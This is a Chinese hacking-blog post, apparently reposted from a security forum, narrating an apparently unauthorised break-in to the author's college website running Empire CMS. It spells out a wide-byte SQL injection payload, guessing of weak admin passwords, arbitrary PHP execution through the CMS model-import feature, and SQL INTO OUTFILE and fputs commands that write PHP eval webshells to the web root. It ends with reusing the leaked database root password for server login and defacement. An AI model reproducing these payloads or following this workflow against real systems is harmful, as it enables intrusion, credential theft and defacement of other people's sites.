WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 入侵笔记 » 对母校官方网站的一次渗透检测经历

对母校官方网站的一次渗透检测经历
作者:T.H.E   分类:入侵笔记   评论(12)   浏览(7628)   关键词: 对母校官方网站的一次渗透检测经历

这篇文章也是我最近才写的,趁热就发表了出来,这篇文章是和我在“脚本安全监测”板块发表的“帝国CMS 7.0后台拿shell”

不说废话了,上文章:

最近我又对学院进行了一次大规模的检测,原来才知道学院官网存在这么弱智的漏洞,首先来看看学院官网,开了N个页面
都是纯静态的页面,基本上无从下手,也许跟我一样的菜鸟朋友会想到旁站与C段,好吧,我们来检测一下,御剑5.1检测无
果,C段检测也只存在一台同网段服务器,如图

1.png

 图1

2.png

图2

显然旁注、C段这条路就没了,还是回到主站,我们学校只有一个主站,没有给二级学院分配二级域名,只是二级目录,所以
无法列出二级域名,这里我就不截图了,既然这样就只能利用各种扫描器硬着头皮上了,先判断对方是啥WEB服务器,随便在
域名后面输入一个不存在的文件名,于是立刻报错,如图 3

3.png

 

图3

猥琐的爆出了服务器的基本信息,这不就是典型的LAMP服务器么,呵呵 ~!我还以为真的纯静态呢,原来是PHP网站,我立刻对它来了兴趣,拿出wwwscan扫敏感目录,不一会儿就露出了马脚,该懂的人都懂
如图4

4.png

图4

看到/e/admin、/d/、/hml/这不就是传说中的帝国CMS的标志性目录么?帝国CMS曾经号称最安全、最稳定的内容管理系统,管
理员这也想到了?打开后台来看看,不是标准的帝国CMS的后台登陆页面,不知道那屌丝管理从哪找的,如图5

5.png

 

图5

先不管这么多了,果断google了一下历史上关于帝国CMS的漏洞,发现了一个较为普遍的漏洞,就是留言板宽字节注入漏洞,直奔
留言本页面:https://www.webshell.ren/e/tool/gbook/?bid=1,显示不存在,如图6

6.png

 图6
将bid=1换成bid=2、bid=3、bid=4、bid=5、bid=6分别是书记信箱、校长信箱、意见反馈、校刊、校报留言、校友留言。呵呵~!
没想到挺丰富的,捡了一个拿来测试了一下,在姓名处输入:“123縗\”(都说过了是宽字节),联系邮箱:,1,1,1,(select concat(us
ername,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*,其他的随便填,果不出我所料网站跳转到/e/enews/index.php,一片空白,啥东西都木有,帝国CMS的老漏洞都无法利用,又木有0day,于是就只好想办法进后
台呗,试了N多常用的管理员用户名及口令,都无法登陆后台。
对了,从wwwscan的扫描结果看,不是说扫出了robots.txt蜘蛛程序么,或许这个蜘蛛程序能给我们带更多的信息,网站通过robots
协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取,虽然说是那么说,但是很多CMS都把后台管理地址,敏感目录放在里面,如果管理员
不修改的话是很危险的,打开一看,如图7
7.png

 图7
呵呵~!看样子好像有学长大人们留下的脚印哦(邪恶的分界线下的是偶进去后写的!)我访问了那几个页面,发现网站存在列目录的漏洞,
如图8 9

8.png

图8

9.png

图9

发现了可爱的config.php文件,可惜看不到源码滴,不过打开https://www.webshell.ren/e/update发现了帝国CMS的升级程序,如图10
10.png

图10

点击“开始升级”后出现不能正常升级的现象。于是目测该帝国CMS是6.5的。
没办法,只好祭出神器Netsparker和WVS,Netsparker这家伙相当于著名WVS的一款WEB综合漏洞的扫描器,集成了包括各种SQL注入、
CSRF、XSS等在内的常用漏洞,有时使用它能达到事半功倍的效果,二话不说,果断在本机上跑起来,由于WVS那强大的爬虫功能,可以检测
出网站管理员隐藏了的敏感目录,并且列出网站所有目录的结构,如图11

11.png

图11 (ps:有需要的点击 知名安全检测工具AWVS)

看了看两个扫描器的目录结构感觉没啥利用价值,不过找出的洞洞就很雷人了,不说了,直接上图1213.png

图13

或许是因为管理员需要编辑config.php时害怕修改失误而造成不必要的损失,所以对config.php做了备份,但是还是被我们爬出来了,管理员还
如此的小心呀,可惜想多了是要产生问题的,数据库的基本信息都被我们知道得一清二楚了,最恶心的是管理员直接用root连接数据库,如果root没被降权的话,如果上次那个phpmyadmin没被删的话,这个网站就基本上搞定了,哎~!可惜没有那么多如果,还是继续收集信息
既然要进后台,我们为什么不收集收集管理员的信息呢,于是我开始分析学院的一些管理分支结构,对于这多部门需要管理,我想不可能只有一个管理应该有很多的(高校网站一般都这样)后来分析才发现学院网站大体分为4大部分,第一部分是新闻部,专门处理各二级学院,各管理机构的新闻信息,发布到首页;第二部分是各个二级学院,每个学院都有个网站管理账号,但是我肯定权限很低,就只能对自己学院板块的修改;第三部分就是学院办公室,这个权限应该就很高了,可以说是仅次于最高权限吧;第四部分就是各个管理机构吧(如教务处、行政办公室、人力资源、招生就业、后勤
部门等),为了方便管理这些部门设置的密码强度应该不大,于是开始猜测这些账号的密码,这些账号信息可以到各个新闻页面的“发布者”那一栏获得,
如图114.png

图14

好吧~!学校网站的这一秘密被我观察出来了,马上去猜解权限偏高的管理用户,在猜解院办的用户密码时,一个弱口令(就不告诉你)就直接进去了,
如图15

15.png

图15

哈~!人品大爆发了,一个多功能的帝国CMS华丽后台展现在了我的眼前,如图16

16.png

图16

呵呵~!看了看服务器的基本信息,跟我预想的一样,这个用户果然是高权限用户,除了“用户操作、模板、插件”那几栏没权限外其他的功能都可以用,
大家都知道PHP网站后台跟ASP不同的是PHP后台的功能强大,不像ASP后台那么简陋,但是拿shell的方法随之变得很灵活,看了看系统设置,居然还可以执行SQL语句,前面对config.php的读取不是root权限么,呵呵~!如果知道网站的根目录的话就淫荡了~!如图17

17.png

图17
哈哈~!权限够大吧~!但是我们不知道网站根目录的绝对路径一切白搭,我想看看有木有能够直接上马的地方,这个问题还困扰了我半天的时间,这帝国
肯定会检查上传后缀的,比如我们找到一个图片上传点,直接上PHP后缀的马会提示禁止上传php文件,对方是APACHE无法利用解析漏洞,如图18

18.png

图18
后来利用APACHE的常见的解析漏洞也无果,网上一个基友给我说可以利用模板管理秒拿shell(乌云已公布),可惜没权限编辑模板呀,哎看来只能硬着头
皮去找网站绝对路径了,再通过执行SQL语句向根目录里写入shell,后来想到了系统管理里的数据表与系统模型,可以导入新的系统模型并写入任意表里面,
于是果断“系统设置”——“数据表与系统模型”——“管理数据表”——“管理系统模型”——“导入系统模型”,如图19
19.png

图19

在数据表名处写上任意后缀,选择导入的文件,这里我选用了一个PHP大马文件,并命名为dama.php.mod上传,眼前出现了令人震惊的画面,如图20

20.png

图20
居然就这样执行了大马代码,擦,原来这么神奇,输入密码后杯具才发生了,居然无法进入大马,如图2121.png

图21

后来我想到了一句话,上了个一句话上去,抓包查看绝对路径,就只抓到了e/admin/ecmsmod.php这个文件(猜测就算这个文件惹的祸),所以我们的马其
实没有真的上传到服务器中,而是在导入到数据库里前被执行了一次,后来发现就算命名为dama.bat.mod都被当做PHP来执行了,原来在这里可以执行任意
PHP代码,而且不会去识别后缀名,这样一来我们就有突破口了,就利用这个漏洞来查找网站绝对路径,在一个文本文件里写入”<?php phpinfo(); ?>”命名
为info.php.mod来探测一下,导入,果然出现了,如图22

22.png

图22

但是还没等我反应过来,它就返回了前面的页面,呵呵,这哪能难倒我等小菜,再次上传info.php.mod,在执行的一瞬间,查看源代码可以扑捉到phpinfo的html源代码,于是就可以查看ecmsmod.php执行phpinfo后的源码,即使页面跳转了,也不会影响我们,果断搜索DOCUMENT_ROOT,成功获取网站根目录的绝对路径,如图23

23.png

图23

绝对路径为/usr/wwwroot/php-proj,呵呵 ,真不好弄呀,下面我想大家都懂了吧,既然数据库是ROOT权限,直接往根目录里写一句话呗,在“系统设置”——“备
份与恢复数据”——“执行SQL语句”,写入以下代码:
create table temp (cmd text not null);
insert into temp (cmd) values('<?php eval($_POST[a])?>');
select cmd from temp into outfile '/usr/wwwroot/php-proj/z.php';
drop table if exists temp;
执行成功,连接一句话,OK,如图24 (PS:phpmyadmin各种技巧拿webshell

24.png

图24

后来测试出一种更简单的方法,直接在“导入系统模型“处,导入1.php.mod,其内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[x]);?>")?>,即可在/e/admin
的目录下(与ecmsmod.php同目录)生成x.php,内容为<?eval(\$_POST[x]);?>")?>的一句话木马。
看了看权限,权限很大,网站根目录都是777的权限,可以修改主页,可以访问系统根目录,看了看帝国CMS的版本,

25.png

图25

看了下服务器的IP地址,如图26

26.png

图26
看到了服务器的内网IP,果断没有和我处于同一子网下,在学校里混了这么久,第一次发现学校网站的内网IP,服务器不能上外网,所以反弹shell提权就没办法了,于是想到校园里有很多服务器,都是可以互相访问的,手里也没有内网服务器,本来打算就此放弃的,突然想到了刚开始我们使用netsparker扫描出的一个config.php~文件,并且从中获得了数据库root的密码,我想服务器密码会不会是那个密码呢,果断一试,居然进去了,如图2727.png

图27
人品又一次大爆发了,这个管理员真该被开除,系统密码和MYSQL密码居然一样,管理员就一懒人,既然ROOT上去了,就达到了我的最终目的,挂个TXT装B走人。


总结:
①        这次成功的渗透源于我对网站信息的细心收集。
②        对内部各管理部门的了解。
③        对帝国CMS安全隐患的了解。
④        管理员的懒惰,认为服务器在内网放着就高枕无忧了。
⑤        各个管理部门对安全的忽视。
⑥        勇于探索。


本文作者不是我 我只是本文章搬运工 谢谢大家支持我博客

文章来源:T00LS论坛


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-215.html
分享本文至:

发表评论:

erbi
[回复该留言]
2015-09-05 21:38
太棒了 精彩
荷兰网
[回复该留言]
2015-03-14 06:12
好文章,内容栩栩如生.
I LOVE THE [回复该留言]
2015-01-10 05:06
我最喜欢看这种思路型类文章了~辛苦博主搬运了
T.H.E
[回复该留言]
2015-01-10 09:13
@I LOVE THE:嗯嗯
qq [回复该留言]
2016-01-10 22:05
@T.H.E:呵呵克隆
T.H.E
[回复该留言]
2016-01-11 10:21
@qq:嗯
abner [回复该留言]
2015-01-05 06:29
基友博客越来越牛逼了
T.H.E
[回复该留言]
2015-01-05 08:39
@abner:没有
土蚂蚁 [回复该留言]
2015-01-04 17:25
我擦勒   你这个漏洞略屌
T.H.E
[回复该留言]
2015-01-04 17:45
@土蚂蚁:恩
Dark
[回复该留言]
2015-01-04 15:06
数据库暴露了  你还是修改下图吧  马赛克不到位
T.H.E
[回复该留言]
2015-01-04 15:16
@Dark:算了没事 这文章转来的很久了

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->